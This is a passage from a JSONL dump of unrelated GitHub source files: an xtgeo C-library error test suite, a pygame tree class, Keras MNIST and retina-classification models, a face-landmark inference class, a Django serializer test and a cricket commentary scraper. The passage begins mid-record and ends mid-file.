data_row_id)\n prediction_id = create_label(json.dumps(row['prediction_label']), project_id, data_row_id)\n print('Created Prediction: %s %s' , (prediction_id), (data_row_id))\n#writer.addObject('label_name', int(pt[0]), int(pt[1]), int(pt[2]), int(pt[3])) \n#writer.save('golovin.xml')\n\n\n# In[165]:\n\n\nfor i in range(1,3):\n print(i)\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AlexanderSlav/Diploma","sub_path":"ipynb.py","file_name":"ipynb.py","file_ext":"py","file_size_in_byte":16155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41928956961","text":"import io\nimport os\nimport stat\n\nimport numpy as np\nimport pytest\n\nimport xtgeo\nfrom xtgeo.cxtgeo import _cxtgeo\n\n\n@pytest.fixture()\ndef unreadable_file(setup_tmpdir):\n fname = \"random_file_name\"\n with open(fname, \"w\"):\n pass\n os.chmod(fname, stat.S_IREAD)\n # On some systems the chmod fails, meaning we are able to write to the\n # file. In those cases we skip the test:\n if os.access(fname, os.W_OK):\n pytest.skip(\"Have write access to file\")\n yield fname\n os.chmod(fname, stat.S_IWRITE)\n os.remove(fname)\n\n\ndef test_grdcp3d_get_xyz():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Errors in array lengths checks in grdcp3d_calc_xyz\",\n ):\n xv, yv, zv = _cxtgeo.grdcp3d_calc_xyz(\n 1,\n 1,\n 1,\n np.array([0.0]),\n np.array([1.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n 0, # option\n 1, # len(xv) / yv / zv\n 1,\n 1,\n )\n\n\ndef test_grdcp3d_from_cube():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Bug in: grdcp3d_from_cube\",\n ):\n _cxtgeo.grdcp3d_from_cube(\n 1,\n 1,\n 1,\n np.array(\n [\n [\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n ]\n ]\n ),\n np.array(\n [\n [\n [\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n ]\n ]\n ],\n dtype=np.float32,\n ),\n np.array(\n [[[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]], dtype=np.int32\n ),\n 1.0,\n 1.0,\n 1.0,\n -1,\n 1,\n 1,\n 0.0,\n 0,\n 1,\n )\n\n\n@pytest.mark.parametrize(\"func\", [_cxtgeo.x_ic2ijk, _cxtgeo.x_ib2ijk])\ndef test_calc_i_to_ijk(func):\n with pytest.raises(\n xtgeo.XTGeoCLibError, match=f\"Critical error in: {func.__name__}\"\n ):\n func(0, 3, 4, 5, 2)\n\n\ndef test_export_grid_cornerpoint_roxapi_v1():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Errors in array lengths checks in grd3d_conv_grid_roxapi\",\n ):\n _cxtgeo.grd3d_conv_grid_roxapi(\n 1,\n 1,\n 1,\n np.array([0.0]),\n np.array([1.0]),\n np.array([1], dtype=np.int32),\n 1,\n 1,\n 1,\n )\n\n\ndef test_surf_export_petromod_exception_no_file():\n with pytest.raises(\n xtgeo.XTGeoCLibError, match=\"Cannot open file in: surf_export_petromod_bin\"\n ):\n _cxtgeo.surf_export_petromod_bin(\n None,\n \"not_relevant\",\n [1],\n )\n\n\ndef test_surf_export_petromod_exception():\n gfile = xtgeo._XTGeoFile(io.BytesIO(b\"\\x00\"))\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Error writing to Storm format. Bug in: surf_export_petromod_bi\",\n ):\n _cxtgeo.surf_export_petromod_bin(\n gfile.get_cfhandle(),\n \"not_relevant\",\n [1, 2],\n )\n\n\n# @pytest.mark.xfail(reason=\"Quite hard to make test case\")\n# def test_grd3d_ecl_tsteps():\n# gfile = xtgeo._XTGeoFile(io.BytesIO(b\"\\x00\"))\n# seq = _cxtgeo.new_intarray(10)\n# day = _cxtgeo.new_intarray(10)\n# mon = _cxtgeo.new_intarray(10)\n# yer = _cxtgeo.new_intarray(10)\n#\n# with pytest.raises(\n# xtgeo.XTGeoCLibError,\n# match=\"Fail in dimensions in \",\n# ):\n# _cxtgeo.grd3d_ecl_tsteps(\n# gfile.get_cfhandle(),\n# seq,\n# day,\n# mon,\n# yer,\n# 10,\n# )\n\n\n@pytest.mark.parametrize(\n \"bytestring, mx, expected_msg\",\n [\n (b\"\\x00\", 1, r\"mx \\* my != nsurf\"),\n (b\"\\x00\\x00\", 2, \"Failed to read file in: surf_import_petromod_bin\"),\n (b\"\\x00\\x00\\x00\\x00\", 2, \"Error when reading file in:\"),\n ],\n)\ndef test_surf_import_petromod_bin(bytestring, mx, expected_msg):\n gfile = xtgeo._XTGeoFile(io.BytesIO((bytestring)))\n with pytest.raises(xtgeo.XTGeoCLibError, match=expected_msg):\n _cxtgeo.surf_import_petromod_bin(gfile.get_cfhandle(), 1, 0.0, mx, 2, 4)\n\n\ndef test_surf_sample_grd3d_lay():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Errors in array lengths checks in:\",\n ):\n _cxtgeo.surf_sample_grd3d_lay(\n 1,\n 1,\n 1,\n np.array([0.0]),\n np.array([1.0]),\n np.array([1], dtype=np.int32),\n 1,\n 1,\n 1,\n 1,\n 1.0,\n 1.0,\n 1.0,\n 1.0,\n np.array([0.0]),\n np.array([0.0]),\n np.array([0.0]),\n 1,\n )\n\n\ndef test_grd3d_read_eclrecord():\n with pytest.raises(xtgeo.XTGeoCLibError, match=\"Cannot use file\"):\n _cxtgeo.grd3d_read_eclrecord(\n None,\n 1,\n 1,\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.float32),\n np.array([1], dtype=np.float64),\n )\n\n\ndef test_grd3d_reduce_onelayer():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"IFLAG other than 0 not implemented\",\n ):\n _cxtgeo.grd3d_reduce_onelayer(\n 0,\n 0,\n 0,\n np.array([0.0]),\n np.array([1.0]),\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.int32),\n _cxtgeo.new_intarray(1),\n 1,\n )\n\n\ndef test_grd3d_points_ijk_cells_nxvec():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=r\"nxvec != nyvec or nyvec != nzvec\",\n ):\n carr = [_cxtgeo.new_doublearray(1) for _ in range(4)]\n [_cxtgeo.swig_numpy_to_carr_1d(np.array([1.0]), arr) for arr in carr]\n\n _cxtgeo.grd3d_points_ijk_cells(\n np.array([1.0], dtype=np.float64),\n np.array([0.0, 0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n 1,\n 1,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 1,\n carr[0],\n carr[1],\n carr[2],\n carr[3],\n 1,\n 1,\n 1,\n np.array([0.0], dtype=np.float32),\n np.array([1.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([0.0], dtype=np.float64),\n 1,\n 1,\n 1,\n 1,\n )\n\n\ndef test_grd3d_points_ijk_cells_nivec():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=r\"nivec != njvec or nivec != nkvec\",\n ):\n carr = [_cxtgeo.new_doublearray(1) for _ in range(4)]\n [_cxtgeo.swig_numpy_to_carr_1d(np.array([1.0]), arr) for arr in carr]\n\n _cxtgeo.grd3d_points_ijk_cells(\n np.array([1.0], dtype=np.float64),\n np.array([0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n 1,\n 1,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 1,\n carr[0],\n carr[1],\n carr[2],\n carr[3],\n 1,\n 1,\n 1,\n np.array([0.0], dtype=np.float32),\n np.array([1.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([0.0], dtype=np.float64),\n 1,\n 2,\n 1,\n 1,\n )\n\n\ndef test_grd3cp3d_xtgformat1to2_geom():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Error in: grd3cp3d_xtgformat1to2_geom, ib != nzcorn2\",\n ):\n _cxtgeo.grd3cp3d_xtgformat1to2_geom(\n -1,\n -1,\n -1,\n np.array([0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([0.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.int32),\n )\n\n\ndef test_grd3cp3d_xtgformat2to1_geom():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Error in grd3cp3d_xtgformat2to1_geom, ib != nzcorn1\",\n ):\n _cxtgeo.grd3cp3d_xtgformat2to1_geom(\n -1,\n -1,\n -1,\n np.array([0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([0.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.int32),\n )\n","repo_name":"equinor/xtgeo","sub_path":"tests/test_etc/test_clib_errors.py","file_name":"test_clib_errors.py","file_ext":"py","file_size_in_byte":9217,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"83"} +{"seq_id":"27896472268","text":"from Point3D import*\nfrom GameObject import*\nfrom GlobeObject import*\nimport pygame\nimport pygame.gfxdraw\nimport math\nimport random\n\nclass Plant(GlobeObject):\n def __init__(self, groups):\n super(Plant, self).__init__(groups)\n\n def grow(self):\n pass\n\n\nclass Tree(Plant):\n def __init__(self, charAngle, globeRadius,screen, sun, groups):\n self.groups = groups\n self.sun = sun\n\n self.treeHeight = 10\n self.distance = globeRadius+self.treeHeight\n self.radius, self.refRadius, self.tempRadius = 20, 20, 20#radius for drawing the frame,\n #radius for changing the radius of the object\n #radius for drawing the radius\n\n self.angle1, self.angle2= charAngle, 90\n self.fov = self.viewer_distance * self.distance\n self.screen = screen\n self.point3D = Point3D(self.angle1, self.angle2)\n self.x, self.y = self.point3D.project(self.screen.get_width(), \n self.screen.get_height(), self.fov, self.viewer_distance)\n self.z = self.point3D.z\n self.lightColor = (255,230,91)\n \n\n super(Tree, self).__init__( groups)\n self.addLight(sun)\n\n def draw(self):\n\n self.createNewSurface()\n self.updateRadius()\n #self.decreaseRadius()\n self.radius = self.tempRadius\n self.drawTrunk()\n \n pygame.gfxdraw.filled_circle(self.image, self.radius, self.radius, int(self.tempRadius), (130,242,158))\n self.drawTrunk()\n self.drawLight()\n\n def drawTrunk(self):\n self.trunkDist = self.globeRadius-20\n self.trunkfov = self.viewer_distance * self.trunkDist\n self.trunkX, self.trunkY = self.point3D.project(self.screen.get_width(), \n self.screen.get_height(), self.trunkfov, self.viewer_distance)\n\n\n pygame.draw.line(self.screen, (244,158, 66), (self.x, self.y), (self.trunkX, self.trunkY), 3)\n\n def decreaseRadius(self):\n self.refRadius -= 0.1 \n\n def rotate(self, angle, dir, speed):\n self.fov = self.viewer_distance * self.radius\n Globe.rotate(self, angle, dir, speed)\n\n self.fov = self.viewer_distance * self.distance\n super(Tree, self).rotate(angle, dir, speed)\n\n","repo_name":"CandiaGu/Globe","sub_path":"src/Plant.py","file_name":"Plant.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37893814229","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPool2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import load_model\n\ndef load_dataset(online=False):\n if online:\n (tr_data, tr_label), (te_data, te_label) = tf.keras.datasets.mnist.load_data()\n else:\n path = \"mnist.npz\"\n (tr_data, tr_label), (te_data, te_label) = tf.keras.datasets.mnist.load_data(path)\n\n print(tr_data.shape)\n print(te_data.shape)\n\n return (tr_data, tr_label), (te_data, te_label)\n\n\ndef make_model():\n model = Sequential()\n model.add(Conv2D(filters=32, kernel_size=(5, 5), strides=(1, 1),\n activation=\"relu\",\n input_shape=(28, 28, 1),\n padding=\"same\"))\n model.add(MaxPool2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Conv2D(64, (5, 5), activation=\"relu\", padding=\"same\"))\n model.add(MaxPool2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Flatten())\n model.add(Dense(1000, activation=\"relu\"))\n model.add(Dense(10, activation=\"softmax\"))\n model.summary()\n\n model.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n return model\n\n# 하이퍼 파라메터\nMY_EPOCH = 5\nMY_BATCHSIZE = 200\ndef train(model, x, y):\n model.fit(x, y, epochs=MY_EPOCH, batch_size=MY_BATCHSIZE)\n filename = \"cnn_filter32.h5\"\n model.save(filename)\n\nif __name__ ==\"__main__\":\n (train_data, train_label), (test_data, test_label) = load_dataset()\n\n train_data = train_data.reshape(train_data.shape[0], 28, 28, 1)\n train_data = train_data.astype(\"float32\")\n train_data /= 255\n\n train_label = tf.keras.utils.to_categorical(train_label, 10)\n\n cnn = make_model()\n # train(cnn, train_data, train_label)\n\n test_data = test_data.reshape(test_data.shape[0], 28, 28, 1)\n test_data = test_data.astype(\"float32\")\n test_data /= 255\n test_label = tf.keras.utils.to_categorical(test_label, 10)\n\n filename = \"cnn_filter32.h5\"\n cnn = load_model(filename)\n cnn.evaluate(test_data, test_label)\n\n","repo_name":"JEONJinah/Kang","sub_path":"cnn_mnist.py","file_name":"cnn_mnist.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2572917253","text":"import tensorflow as tf\nfrom nets.PFLD import PFLDInference\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport time\n\n\nclass FaceKeyPointsNet(object):\n _defaults = {\n \"model_path\": \"./model_data/model.h5\", # 权重路径\n \"input_shape\": [112, 112, 3], # 输入图片大小\n }\n \n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n \n def __init__(self, **kwargs):\n self.__dict__.update(self._defaults)\n for name, value in kwargs.items():\n setattr(self, name, value)\n \n # 使用gpu\n gpus = tf.config.experimental.list_physical_devices(device_type='GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n self.generate()\n print(\"导入模型成功!!!\")\n \n def generate(self):\n self.model = PFLDInference(self.input_shape, is_train=False)\n self.model.load_weights(self.model_path, by_name=True)\n \n def detect_image(self, img):\n \n img_copy = np.copy(img)\n img_copy_h, img_copy_w = img_copy.shape[:2]\n \n img = cv2.resize(img, (self.input_shape[0], self.input_shape[1]))\n img_rgb = cv2.cvtColor(img_copy,cv2.COLOR_BGR2RGB)\n img_data = np.expand_dims(np.array(img)/255.0, 0)\n landmark = self.model.predict(img_data)[0] * self.input_shape[0]\n landmark[0::2] = landmark[0::2] * img_copy_w / self.input_shape[0]\n landmark[1::2] = landmark[1::2] * img_copy_h / self.input_shape[0]\n self.show(img_rgb, landmark)\n \n def show(self, img, landmark):\n plt.imshow(img)\n for i in range(0, len(landmark),2):\n plt.scatter(landmark[i], landmark[i+1], s=20, marker='.', c='m')\n plt.show()\n \n def fps(self, img, n=100):\n start = time.time()\n img = np.array(img)\n img = cv2.resize(img, (self.input_shape[0], self.input_shape[1]))\n img_data = np.expand_dims(np.array(img)/255.0, 0)\n for _ in range(n):\n landmark = self.model.predict(img_data)[0]\n end = time.time()\n avg_time = (end - start)/n\n return avg_time\n \n","repo_name":"hao-ux/PFLD-tf2","sub_path":"PDLD.py","file_name":"PDLD.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"558494539","text":"from django.test import TestCase\nfrom labelit.models import Document, Dataset, DocumentSequence\nfrom labelit.serializers import DocumentSequenceSerializer\n\n\nclass DocumentSequenceSerializerTests(TestCase):\n def setUp(self):\n self.dataset = Dataset.objects.create(name=\"IMDB reviews\")\n self.document_sequence = DocumentSequence.objects.create(\n dataset=self.dataset, num_documents=2\n )\n self.document1 = Document.objects.create(\n text=\"The movie was so wishy-washy I could do my laundry with it\",\n dataset=self.dataset,\n document_sequence=self.document_sequence,\n sequence_index=0,\n )\n self.document2 = Document.objects.create(\n text=\"If my island had a TV, I would bring that one movie with me\",\n dataset=self.dataset,\n document_sequence=self.document_sequence,\n sequence_index=1,\n )\n self.serializer = DocumentSequenceSerializer(instance=self.document_sequence)\n\n def test_contains_expected_fields_and_specific_fields_and_resourcetype(self):\n self.assertEqual(\n set(self.serializer.data.keys()), set([\"dataset\", \"num_documents\"])\n )\n","repo_name":"voicelab-org/labelit","sub_path":"backend/src/labelit/tests/serializers/test_document_sequence_serializer.py","file_name":"test_document_sequence_serializer.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"83"} +{"seq_id":"28474184267","text":"# Databricks notebook source\nmaster_df = spark.read.csv('/dbfs/FileStore/master_df.csv', header = True, inferSchema = True)\n\n# COMMAND ----------\n\nimport re\nimport requests\nimport json\n\n## Input game url, innings number and over number -> outputs dictionary of raw ball by ball information ##\ndef get_raw_over(url, innings, inningsOver):\n \n # grab matchId and seriesId\n url_match = re.match(\"https://www.espncricinfo.com/series/([\\w\\d-]+)-(\\d+)/([\\w\\d-]+)-(\\d+)/ball-by-ball-commentary\", url)\n seriesId, matchId = url_match.group(2), url_match.group(4)\n\n # GET text\n request = f\"https://hs-consumer-api.espncricinfo.com/v1/pages/match/comments?seriesId={seriesId}&matchId={matchId}&inningNumber={innings}&commentType=ALL&fromInningOver={inningsOver}\"\n payload, headers = {}, {} \n response = requests.request(\"GET\", request, headers=headers, data=payload)\n raw_over = json.loads(response.text)\n\n return raw_over[\"comments\"][0]\n\n## Cleans an over of commentary data -> outputs string of ball by ball info for the over ##\ndef clean_over(over):\n \n # Initial clean + reverse order\n over = over['comments']\n Output = ''\n if not over: return Output\n current_over = over[0]['overNumber']\n over.reverse()\n \n # Determine who is batting and save as first line of output \n if current_over == 1:\n batting_team = over[-1]['over']['team']['longName']\n Output += f'{batting_team} Innings: \\n \\n'\n\n for i in range(len(over)): \n \n # Remove double erroneous previous overs from raw data\n if current_over != over[i]['overNumber']: continue\n\n # ball information\n ball_number = over[i]['ballNumber']\n bowl_to_bat = over[i]['title']\n event = ''\n runs = over[i]['totalRuns']\n\n # Special events such as wickets, fours and sixes \n event_dict = {'isFour': 'Four!', 'isSix': 'Six!', 'isWicket': 'Wicket!', 'legbyes': 'legbyes', 'wides': 'Wide.', 'noballs': 'No Ball.'}\n for key, item in event_dict.items():\n if over[i][key]:\n event = item\n\n Output += f'{current_over}.{ball_number} {bowl_to_bat}: {event} {runs} run(s) \\n'\n\n # Commentary prior to, during and after ball #\n comment_elements = ['commentPreTextItems', 'commentTextItems', 'commentPostTextItems']\n comments = ''\n for x in comment_elements:\n try:\n comments += f\"{over[i][x][0]['html']}. \"\n except TypeError:\n continue\n if comments: \n Output += f'{comments} \\n'\n\n return Output \n\n\n## Input url -> outputs list of game commentary ##\ndef get_game(url, clean = True):\n\n game = []\n\n for innings_number in range(1,3):\n for over in range(1,51):\n over = get_raw_over(url, innings_number, over)\n if clean:\n over = clean_over(raw_over)\n game.append(over)\n\n return game\n\n# COMMAND ----------\n\nurl_list = master_df.select(\"ball_by_ball_commentary_url\").rdd.flatMap(lambda x: x).collect()\nsample_url = url_list[0]\n\n# COMMAND ----------\n\nraw_game = get_game(sample_url, clean = False)\nfirst_over = get_raw_over(sample_url,1,1)\nprint(first_over)\n\n# COMMAND ----------\n\nvoer_df = spark.createDataFrame(first_over.items(), ['key', 'value'])\nvoer_df.show()","repo_name":"chrisdixson/super-predictor","sub_path":"03 - commentary_data.py","file_name":"03 - commentary_data.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"30904965031","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function\nimport time\nimport os\nimport numpy as np\nimport pandas as pd\n\nimport data\n\nimport keras\nimport keras.layers\nimport keras.backend as K\nfrom keras.optimizers import SGD\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Conv2D, Conv2D, MaxPooling2D, Dropout, Flatten, Input, GlobalAveragePooling2D, BatchNormalization, LeakyReLU, AveragePooling2D\nfrom keras.preprocessing import image\nfrom keras.utils.np_utils import to_categorical\nfrom keras.regularizers import l2 \nfrom keras.callbacks import History,TensorBoard,EarlyStopping,Callback,ModelCheckpoint\nfrom keras.utils.vis_utils import plot_model\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.5\nset_session(tf.Session(config = config))\n\n# channel standard deviations\nSTD = np.array([70.53946096, 51.71475228, 43.03428563], dtype=np.float32)\n\n# channel means\nMEAN = np.array([108.64628601, 75.86886597, 54.34005737], dtype=np.float32)\n\n#generator\ntrain_gen = image.ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True)\ntest_gen = image.ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True)\n\n#计算敏感度和特异度的俩函数\n\ndef sensi(y_true, y_pred):\n\n y_pred = tf.convert_to_tensor(y_pred, np.float32)#newly added \n y_true = tf.convert_to_tensor(y_true, np.float32)\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n\n tp = K.sum(y_pos * y_pred_pos)\n tn = K.sum(y_neg * y_pred_neg)\n\n fp = K.sum(y_neg * y_pred_pos)\n fn = K.sum(y_pos * y_pred_neg)\n\n return tp / (tp + fn + K.epsilon())\n\ndef speci(y_true, y_pred):\n y_pred = tf.convert_to_tensor(y_pred, np.float32)\n y_true = tf.convert_to_tensor(y_true, np.float32)\n\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n\n tp = K.sum(y_pos * y_pred_pos)\n tn = K.sum(y_neg * y_pred_neg)\n\n fp = K.sum(y_neg * y_pred_pos)\n fn = K.sum(y_pos * y_pred_neg)\n\n return tn / (tn + fp + K.epsilon()) \n\ndef get_images(files): #这和data里写的不是差不多么? 下面还删了?smg???\n images = []\n for i in range(len(files)):\n img = image.load_img(files[i])\n tmp = image.img_to_array(img)\n #np.subtract(tmp, MEAN[np.newaxis, np.newaxis, :], out=tmp)\n #np.divide(tmp, STD[np.newaxis, np.newaxis, :], out=tmp)\n #tmp = data.augment_color(tmp, sigma=0.25)\n images.append(tmp)\n\n return images\n\ndef get_labels(labels):\n targets = to_categorical(labels, 5)\n return targets\n\ndef get_testset(files,labels):\n images = get_images(files)\n targets = get_labels(labels)\n return np.array(images), np.array(targets)\n\ndef get_trainset(files, labels):\n images = get_images(files)\n #print(np.array(images).shape)\n targets = get_labels(labels)\n return np.array(images), np.array(targets)\n\ndef create_net():\n net = NetModel()\n return net\n\nclass NetModel():\n def __init__(self):\n self.debug = 1\n self.comment_build()\n\n def identity_block(input_tensor, kernel_size, filters, stage, block):\n nb_filter1, nb_filter2, nb_filter3 = filters\n if K.image_dim_ordering() == 'tf':\n bn_axis = 3\n else:\n bn_axis = 1\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(nb_filter1, 1, 1, name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter2, kernel_size, kernel_size,\n padding='same', name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)\n\n x = merge([x, input_tensor], mode='sum')\n x = Activation('relu')(x)\n return x\n\n\n def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2)):\n nb_filter1, nb_filter2, nb_filter3 = filters\n if K.image_dim_ordering() == 'tf':\n bn_axis = 3\n else:\n bn_axis = 1\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(nb_filter1, 1, 1, subsample=strides,\n name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter2, kernel_size, kernel_size, padding='same',\n name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)\n\n shortcut = Conv2D(nb_filter3, 1, 1, subsample=strides,\n name=conv_name_base + '1')(input_tensor)\n shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1')(shortcut)\n\n x = merge([x, shortcut], mode='sum')\n x = Activation('relu')(x)\n return x\n\n def build_model(self):\n img_input = Input(shape=(512, 512, 3))\n\n x = ZeroPadding2D((3, 3))(img_input)\n x = Conv2D(64, 7, 7, subsample=(2, 2), name='conv1')(x)\n x = BatchNormalization(axis=bn_axis, name='bn_conv1')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((3, 3), strides=(2, 2))(x)\n\n x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1))\n x = identity_block(x, 3, [64, 64, 256], stage=2, block='b')\n x = identity_block(x, 3, [64, 64, 256], stage=2, block='c')\n\n x = conv_block(x, 3, [128, 128, 512], stage=3, block='a')\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='b')\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='c')\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='d')\n\n x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f')\n\n x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a')\n x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b')\n x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c')\n\n x = AveragePooling2D((7, 7), name='avg_pool')(x)\n\n x = Flatten()(x)\n # x = Dense(1024, activation='relu', name='fc1000')(x)\n x = Dense(5, activation='softmax', name='fc5')(x)\n\n self.model = Model(inputs, x)\n\n def comment_build(self):\n self.model = Sequential()\n\n self.model.add(Conv2D(32, (3,3), input_shape=(512, 512, 3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same',name='block1_conv1'))\n self.model.add(LeakyReLU(alpha=0.01))\n #self.model.add(Conv2D(32, (3,3), input_shape=(4, 256, 256, 3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), activation=LeakyReLU(alpha=0.01), padding='same', name='block1_conv1'))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block1_pool1'))\n self.model.add(Conv2D(32, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block1_conv2'))\n self.model.add(LeakyReLU(alpha=0.01))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block1_pool2'))\n\n # Block 2\n self.model.add(Conv2D(64, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block2_conv1'))\n self.model.add(LeakyReLU(alpha=0.01))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block2_pool1'))\n self.model.add(Conv2D(64, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block2_conv2'))\n self.model.add(LeakyReLU(alpha=0.01))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block2_pool2'))\n\n # Block 3\n self.model.add(Conv2D(128, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block3_conv1'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block3_pool1'))\n self.model.add(Conv2D(128, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block3_conv2'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block3_pool2'))\n\n # Block 4\n self.model.add(Conv2D(256, (3,3), kernel_regularizer=l2(0.01), 